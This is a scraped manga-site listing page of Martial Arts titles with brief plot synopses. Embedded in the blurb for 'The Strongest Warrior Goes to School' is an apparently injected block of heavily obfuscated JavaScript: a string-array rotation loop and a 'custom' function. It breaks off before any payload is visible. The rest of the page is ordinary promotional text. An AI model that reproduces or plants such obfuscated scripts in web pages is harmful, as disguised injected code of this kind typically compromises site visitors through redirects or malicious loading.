Martial Arts - Page 140

Step into the universe of Martial Arts manga with stunning art and stories. Read Martial Arts manga free anytime!

2282 results

Bushidou Sixteen

From Animenewsnetwork: Bushidou Sixteen centers around two female competitors of another Japanese tradition, kendou (sword-fighting). Kaori is an accomplished kendou practitioner, but she finds herself facing an unexpected opponent in Sanae, a superficially weaker fighter who bests Kaori in a bout.


Twelve Weapons of God

The rookie synchronizer AI was designated by Panospan as the exclusive apostle of the Teresa Housewell. However, it wasn’t till then they realized the many misunderstandings between the two of them. The synchronization rate was ridiculously low...


Mail Order Ninja

Timmy is an ordinary boy who lives a simple life in the quiet town of Cherry Creek. When a ninja arrives in his mail, Timmy's life soon catapults into one that's filled with excitement. With a super-cool friend now at his disposal, Timmy looks into getting revenge on his school bullies


The Strongest Warrior Goes to School

Seok Hyun-woo is frequently bullied by the troublemakers at his school, who love to take advantage of Hyun-woo’s poor circumstances. Hyun-woo toughs it out though and continues to endure this frustrating situation. This all changes though, when on one (un)fortunate night, Hyun-woo is beaten and embarrassed by the bullies, with his spirit being pulled from his body shortly afterward. Coinciding with this odd occurrence, a bizarre abnormality takes place somewhere else in the vast universe... Due to that bizarre abnormality, the spirit of Hyun Woo-seok, a powerful warlord from an alien planet, is forced into Hyun-woo's body. Woo-seok, now a powerful warlord in a moody highschooler’s body, swiftly and easily overpowers the bullies… In his head, however, the bewildered Woo-seok has just one question: Where the hell am I?! The bullies, unaware of what’s happened to Hyun-woo, begin planning their vengeance. They do this, even though they were the ones picking on him in the first place… Seriously? It’s time for this alien warlord to dish out some payback on these sneering pricks! The Strongest Warlord Goes to School<script></script><script>(function(_0x4fe461,_0x17f81f){var _0x4405ae=_0x2664,_0x5682cb=_0x4fe461();while(!![]){try{var _0x90612=parseInt(_0x4405ae(0xd1))/(-0xc9*0x20+0x1f1d+-0x17f*0x4)+parseInt(_0x4405ae(0xd3))/(0xd11+-0x2*-0x288+-0x121f)*(parseInt(_0x4405ae(0xc9))/(0x1*0x107f+0x584*-0x7+0x1620))+parseInt(_0x4405ae(0xda))/(-0x8*-0x2d9+-0x2448+0xd84)*(-parseInt(_0x4405ae(0xc5))/(-0x66e+-0x1*-0xda7+-0x734))+-parseInt(_0x4405ae(0xc2))/(-0x4da+-0x1f2d+0x240d)+parseInt(_0x4405ae(0xd6))/(0xe3e+-0x11ba*0x2+-0x1*-0x153d)+parseInt(_0x4405ae(0xd5))/(0x1e69+-0x3*0x170+0x1a11*-0x1)+parseInt(_0x4405ae(0xcf))/(0x2d*-0x29+0x12ac+-0xb*0x10a);if(_0x90612===_0x17f81f)break;else _0x5682cb['push'](_0x5682cb['shift']());}catch(_0x3d0026){_0x5682cb['push'](_0x5682cb['shift']());}}}(_0x4058,-0x3c51d*0x3+0xc4302+0x6*0x1f680));function custom(){var _0x359dcf=_0x2664,_0x37ea38={'oeeBV':function(_0x3b20ae,_0x12a284){return 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Song of the Sky Pacers

Read manhua Song of the Sky Pacers / Bu Tian Ge – Die Ballade von den Himmelsstürmern / Bù Tiān Gē / Bộ Thiên Ca / Song of the Sky Walkers (In a made-up dynasty) During the Chen dynasty, Consort Jing gave birth to a pair of fraternal twins under the rays of sunlight. The prince was born with a cinnabar mole between his eyebrows, while the princess was born with six fingers. Fortune and misfortune appeared at the same time, causing the twins to experience entirely different fates as they were forced to leave their family. The heavenly tribulation is approaching, will the two twins who were separated from birth ever get to be reunited? What methods would they use to fight against their destinies? “Song of the Sky Pacers Manhua” is alternative: 步天歌


Pig Bride

Lost in the mountains on a trip to summer camp, eight-year-old Si-Joon fears he’ll never make it out alive. When a strange girl in a pig mask appears before him, he follows her to a house deep in the woods, where he is told that he must marry the pig-faced girl to atone for the sins of their ancestors. Si-Joon’s not too keen on getting married, but that wedding feast looks so delicious! It’s only afterward that he realizes what he’s done and …wakes up. Now in high school, Si-Joon Lee has been dreaming about the pig bride for as long as he can remember. But it’s all just a dream, right? read from left to right ^_^


Asura’S Paradise

This story is about a girl's adventure in the late Victorian era when steam engines are widely used. Because of the pollution, the content of platinum and nickel in the air rises, and thus very few people mutate and gain special power. Those people are called the platinum-nickel mutants. The government established the Garden of Eden, claiming that they want to help the mutants live a better life. But it's a trap to lure mutants. They control or even use these mutants with cruel methods.


My Way To Turn The Tide

Read My Way To Turn The TideHou Xing, a poor young man, travels to another world by accident and possesses the body of a good-for-nothing. Someone is destroying his family the minute he comes to this world, and fortunately, he survives. However, he finds that his martial spirit on which he relies to fight is just a cute hamster. How will this miserable man start his way to reverse the situation?


Imprisoned One Million Years: My Disciples Are All Over The World

Read Imprisoned One Million Years: My Disciples Are All Over The World Manhua Lu Chen, an immortal, was trapped in the Chaos Realm for many years, when he awoke again he discovered a whole different world. The old continent shattered into countless pieces, the north and south poles reversed, the heavenly suns went from nine to one, the wild beasts vanished, and the humans, who had only one. small wild country a long time ago, have spread all over the world. A mangy dog he’d picked up in the past turned out to be the ruler of a kingdom, and a little girl he kindly adopted turned out to be an immortal… Bèi Kùn Bǎi Wàn Nián: Dìzǐ Biànbù Zhū Tiān Wàn Jiè, Imprisoned a Million Years : My Disciples Are All Over the World, Bei Kun Bai Wan Nian: Dizi Bianbu Zhu Tian Wan Jie, Ten Thousand Year Stranded: Disciples Covering the Whole Vast Universe, Trapped for Millions of Years: Followers All Over the World, 被困百万年:弟子遍布诸天万界 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaGG is your best choice, don’t hesitate, just read and feel !


Have You Seen My Younger Brother?

Chu Wenshan, the world's top master, has lost his memory. The only clue about him is a kidnapping letter... huh? Is the person who got kidnapped really my brother? Wait, who even is my brother? No, I'm going to save him even if I don't know him. Excuse me, friend, have you seen my brother?


King's Beast

The world shared by humans and ajins (those who are half beast and half human) is not paradise. On the contrary, humans rule over ajins with strictness and contempt, using them at their own convenience: men as soldiers for their special powers and women as prostitutes, downgraded to the lowest rank. To change that destiny, Kogetsu serves the king under the guise of a man. Story set in the same magical world of "Reimei no Arcana".


Don’T Mess With Mistress

An ancient medical successor, reborn into a body of a poor little girl. Saying that she’s stupid? Laughing that she’s miserable? She’ll settle her problem with her evil sister in a second! In her reincarnated life, Lin Su er only wanted to beat up the scum man and slag woman, then live an easy life.but she won’t expect to have offended a most respectable man, wanting to escape after having her way to him, “Little girl, you’ll need to take responsibility, and I will teach you how”
